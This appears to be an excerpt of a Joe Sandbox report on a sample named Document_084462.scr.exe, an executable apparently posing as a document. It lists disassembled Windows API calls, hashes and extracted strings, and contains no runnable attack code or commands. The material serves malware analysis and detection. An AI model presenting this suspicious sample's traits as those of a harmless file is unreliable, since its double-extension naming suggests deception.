                                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E38
                                                                              • SetWindowLongW.USER32(?,000000FC,004053CA), ref: 00404E52
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E66
                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E7A
                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404E8F
                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E9B
                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EAD
                                                                              • DeleteObject.GDI32(00000110), ref: 00404EB2
                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EDD
                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EE9
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F84
                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FB4
                                                                                • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,?,004041A4), ref: 00404387
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FC8
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FF6
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405004
                                                                              • ShowWindow.USER32(?,00000005), ref: 00405014
                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405115
                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405177
                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040518C
                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B0
                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D3
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051E8
                                                                              • GlobalFree.KERNEL32(?), ref: 004051F8
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405271
                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531A
                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405329
                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 00405353
                                                                              • ShowWindow.USER32(?,00000000), ref: 004053A1
                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053AC
                                                                              • ShowWindow.USER32(00000000), ref: 004053B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                              • String ID: $M$N
                                                                              • API String ID: 2564846305-813528018
                                                                              • Opcode ID: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                                                              • Instruction ID: 7baa9a5517a4605733e15ddb68db2cf5b5f1e79b3ae63259faab1fa91bacf49a
                                                                              • Opcode Fuzzy Hash: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                                                              • Instruction Fuzzy Hash: 24127A70900609EFDB20CF65CC45AAF7BB5FB85314F10817AEA10BA2E1DB798951DF58
                                                                              APIs
                                                                              • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045A1
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045B5
                                                                              • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045D2
                                                                              • GetSysColor.USER32(?), ref: 004045E3
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045F1
                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045FF
                                                                              • lstrlenW.KERNEL32(?), ref: 00404604
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404611
                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404626
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040467F
                                                                              • SendMessageW.USER32(00000000), ref: 00404686
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046B1
                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046F4
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404702
                                                                              • SetCursor.USER32(00000000), ref: 00404705
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040471E
                                                                              • SetCursor.USER32(00000000), ref: 00404721
                                                                              • SendMessageW.USER32(00000111,?,00000000), ref: 00404750
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404762
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                              • String ID: Call$N$zD@
                                                                              • API String ID: 3103080414-4182535457
                                                                              • Opcode ID: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                                                              • Instruction ID: a130e1d57a17a91ade9f3fb54c611fa5fc44c03720afd6b67d12dead6e9fe9b9
                                                                              • Opcode Fuzzy Hash: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                                                              • Instruction Fuzzy Hash: 3D6181B1900209BFDB10AF60DD85E6A7BA9FB85354F00803AFB05B72D1C778A951CF99
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061D5,?,?), ref: 00406075
                                                                              • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                                                                • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                                                                • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                                                              • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                                                              • wsprintfA.USER32 ref: 004060B9
                                                                              • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 004060F4
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406103
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040613B
                                                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                                                              • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A9
                                                                                • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                                • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                              • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                                                              • API String ID: 2171350718-2304911260
                                                                              • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                                                              • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                                                              • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                                                              • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                                                              • Instruction ID: d956376f91ba3d110af617c57d1628f0fb3f6748c3ab60faf4ed9a16e53922cc
                                                                              • Opcode Fuzzy Hash: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                                                              • Instruction Fuzzy Hash: 78418B71800209AFCF058FA5CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                                                              APIs
                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                                                              • CharNextW.USER32(?,00000000,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                                                              • CharPrevW.USER32(?,?,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E
                                                                              • *?|<>/":, xrefs: 004066EF
                                                                              • "C:\Users\user\Desktop\Document_084462.scr.exe", xrefs: 0040669D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: "C:\Users\user\Desktop\Document_084462.scr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 589700163-2591860920
                                                                              • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                              • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                                                              • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                              • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                                                              • GetSysColor.USER32(00000000), ref: 00404406
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404412
                                                                              • SetBkMode.GDI32(?,?), ref: 0040441E
                                                                              • GetSysColor.USER32(?), ref: 00404431
                                                                              • SetBkColor.GDI32(?,?), ref: 00404441
                                                                              • DeleteObject.GDI32(?), ref: 0040445B
                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404465
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                              • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                                                              • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                              • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 0040278B
                                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 004027AE
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027C4
                                                                                • Part of subcall function 00405FC5: SetFilePointer.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,004026C9,00000000,00000000,?,00000000,00000011), ref: 00405FDB
                                                                              • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 00402870
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                              • String ID: 9
                                                                              • API String ID: 163830602-2366072709
                                                                              • Opcode ID: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                                                              • Instruction ID: d74bd8ffb6d519048d690203a29de729842be89db78b0864c200dffe12222895
                                                                              • Opcode Fuzzy Hash: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                                                              • Instruction Fuzzy Hash: 1451F875D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D1A
                                                                              • GetMessagePos.USER32 ref: 00404D22
                                                                              • ScreenToClient.USER32(?,?), ref: 00404D3C
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D4E
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D74
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                              • Instruction ID: 46b4da8a0d4c37396bcf421d2915c418c0d79b1a62bcd48facf8de7c649397b3
                                                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                              • Instruction Fuzzy Hash: 80015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61D0DBB4AA058BA5
                                                                              APIs
                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402F49
                                                                              • MulDiv.KERNEL32(0006F352,00000064,0006F556), ref: 00402F74
                                                                              • wsprintfW.USER32 ref: 00402F84
                                                                              • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                              Strings
                                                                              • verifying installer: %d%%, xrefs: 00402F7E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: verifying installer: %d%%
                                                                              • API String ID: 1451636040-82062127
                                                                              • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                                                              • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                                                              • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                                                              • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                                                              APIs
                                                                                • Part of subcall function 700B121B: GlobalAlloc.KERNELBASE(00000040,?,700B123B,?,700B12DF,00000019,700B11BE,-000000A0), ref: 700B1225
                                                                              • GlobalFree.KERNEL32(?), ref: 700B26A3
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B26D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$Alloc
                                                                              • String ID:
                                                                              • API String ID: 1780285237-0
                                                                              • Opcode ID: ba4fee2231d47a4195e4bef62fb2b5dc8d4ddfa0cb938bb5ce29b8027cc0b038
                                                                              • Instruction ID: 3ba527704f655ed381fc54aedf2f8c614e3691766d4e092476334badc084e72f
                                                                              • Opcode Fuzzy Hash: ba4fee2231d47a4195e4bef62fb2b5dc8d4ddfa0cb938bb5ce29b8027cc0b038
                                                                              • Instruction Fuzzy Hash: 9731CF32114181EFE726AF75CC94EAE77BAEB85B31724462DF24187260C738AD14DB61
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                              • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                              • String ID:
                                                                              • API String ID: 2667972263-0
                                                                              • Opcode ID: 737b8f8522516fb9cb569b363d46e537343e0b0d97911977c4cfac53617ae32f
                                                                              • Instruction ID: a183675b87451ddc5318bffc5c3e349b28a5858cebf66036b341c16136851789
                                                                              • Opcode Fuzzy Hash: 737b8f8522516fb9cb569b363d46e537343e0b0d97911977c4cfac53617ae32f
                                                                              • Instruction Fuzzy Hash: B521AE71800124BBDF216FA5DE4999F7E79EF04364F10023AF560762E1CB784D419B98
                                                                              APIs
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B2522
                                                                                • Part of subcall function 700B122C: lstrcpynW.KERNEL32(00000000,?,700B12DF,00000019,700B11BE,-000000A0), ref: 700B123C
                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 700B24A8
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 700B24C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                              • String ID:
                                                                              • API String ID: 4216380887-0
                                                                              • Opcode ID: ec094b8c0bcd1a643fa9f27831fff5dbe774eb8d2c835ed5f8e0a29962e4b985
                                                                              • Instruction ID: f9c0aede8b082833350e1bf7fb2c18a468cd8c1812fce6c071948ae1274cca6b
                                                                              • Opcode Fuzzy Hash: ec094b8c0bcd1a643fa9f27831fff5dbe774eb8d2c835ed5f8e0a29962e4b985
                                                                              • Instruction Fuzzy Hash: AE41ACB1008385EFD325AF71CC44AAE77F9EB48B30B20492DE54686692DB78A9448B61
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                              • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                              • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                                                              • Instruction ID: b40b93da7826e3b7615b819c1b58470e7634271ab5df736de73e72df9abaa9c9
                                                                              • Opcode Fuzzy Hash: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                                                              • Instruction Fuzzy Hash: 1521F572904119AFCB05DFA4DE45AEEBBB5EB08304F14403AF945F62A0CB389D51DB99
                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401E51
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                              • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                              • String ID:
                                                                              • API String ID: 3808545654-0
                                                                              • Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                              • Instruction ID: e0f466a359637f901669b8d4edcb0a2768f8d1cf7dbd19b4a84ec7a1be175679
                                                                              • Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                              • Instruction Fuzzy Hash: 3301D871950651EFEB006BB4AE89BDA3FB0AF15300F10493AF141B71E2C6B90404DB2D
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,700B2238,?,00000808), ref: 700B1635
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,700B2238,?,00000808), ref: 700B163C
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,700B2238,?,00000808), ref: 700B1650
                                                                              • GetProcAddress.KERNEL32(700B2238,00000000), ref: 700B1657
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B1660
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                              • String ID:
                                                                              • API String ID: 1148316912-0
                                                                              • Opcode ID: 59bac89256e00a1281f6c25986cee5f4fe020e10da6adf069332286c60a813ac
                                                                              • Instruction ID: 6f8d356a0452a60aa375db1344746a32f4d88e64ae3c0bbceb813c0ad9d02d06
                                                                              • Opcode Fuzzy Hash: 59bac89256e00a1281f6c25986cee5f4fe020e10da6adf069332286c60a813ac
                                                                              • Instruction Fuzzy Hash: 3DF0987321A1387FA62126A78C4CDDBBE9CDF8B2F5B210315F728A21A086B15D0197F1
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
